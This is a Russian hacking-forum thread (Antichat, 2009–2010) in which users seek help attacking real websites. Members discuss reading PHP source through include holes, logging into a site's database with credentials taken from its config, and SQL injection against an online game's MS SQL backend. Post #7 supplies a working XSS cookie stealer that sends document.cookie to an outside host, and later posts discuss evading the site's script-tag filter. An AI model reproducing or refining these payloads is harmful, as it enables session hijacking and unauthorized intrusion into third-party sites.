ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.12.2009, 15:44
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
 
Ответить с цитированием

  #2  
Старый 24.12.2009, 15:47
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от гаррет-тень  
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
 
Ответить с цитированием

  #3  
Старый 31.12.2009, 04:31
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
 
Ответить с цитированием

  #4  
Старый 31.12.2009, 08:55
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
Сообщение от Nightmarе  
Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
то что порт открыт - не значит, что тебе туда можно
 
Ответить с цитированием

  #5  
Старый 24.12.2009, 15:57
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


По умолчанию

Цитата:
Сообщение от гаррет-тень  
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
php-include
При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
читалка файлов
Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #6  
Старый 09.01.2010, 18:31
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
 
Ответить с цитированием

  #7  
Старый 09.01.2010, 19:05
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от Nightmarе  
Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
создай на своём хосте 1.js в него впиши
PHP код:
 img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
ну и где ты там нашел xss впиши :

PHP код:
<script src=http://site.ru/1.js></script> 
 
Ответить с цитированием

  #8  
Старый 09.01.2010, 20:15
Cry Wolf
Новичок
Регистрация: 18.07.2008
Сообщений: 12
С нами: 9376826

Репутация: 3
По умолчанию

Речь о сайте онлайновой РПГ. Тут MS SQL, не имел с ний дела никогда и не нашел ничего внятного, везде практически речь о MySQL.


выглядит так:
Код:
/reset?char=Fate
Выводит страницу которая показывает характеристики персонажа и кол-во уровней до ресета.

Примерно так:

Status On

Name Fate

Class Fairy Elf

Level 1

Resets 0

PK Level Default

Map Devias

Strenght 22

Agility 25

Vitality 10

Energy 15

[code]/reset?char=Fate'[code] выводит ошибку БД соответсвенно,

та же ошибка
Код:
/char/Fate'
та же в регестрации в поле e-mail.

Код:
char/Fate'%20or%201=1--%20%20SELECT%20*%20FROM%20product%20WHERE%20PCategory=#char# or 1=1--
дает вывод

Status

Name darkknight

Class Dark Knight

Level 1

Resets 0

PK Level Default

Map Lorencia

Strenght 18

Agility 18

Vitality 15

Energy 30


Вроде все так, но в поле статус отсутствуют данные, а поля Strenght, Agility, Vitality, Energy не соответствуют полю класс, то есть если поле класс у нас Dark Knight, то эти поля не могут иметь такие значения.

Вопрос, инъекция ли это и можно ли извлечь что либо полезное из всего этого? Если можно, то подскажите плз где можно почитать подробно про MS SQL inj.

Последний раз редактировалось Cry Wolf; 09.01.2010 в 20:17..
 
Ответить с цитированием

  #9  
Старый 10.01.2010, 06:24
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
создай на своём хосте 1.js в него впиши
PHP код:
 img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
ну и где ты там нашел xss впиши :

PHP код:
<script src=http://site.ru/1.js></script> 
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.

Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
 
Ответить с цитированием

  #10  
Старый 24.12.2009, 16:00
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

поищу прям ща))) и все-таки?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.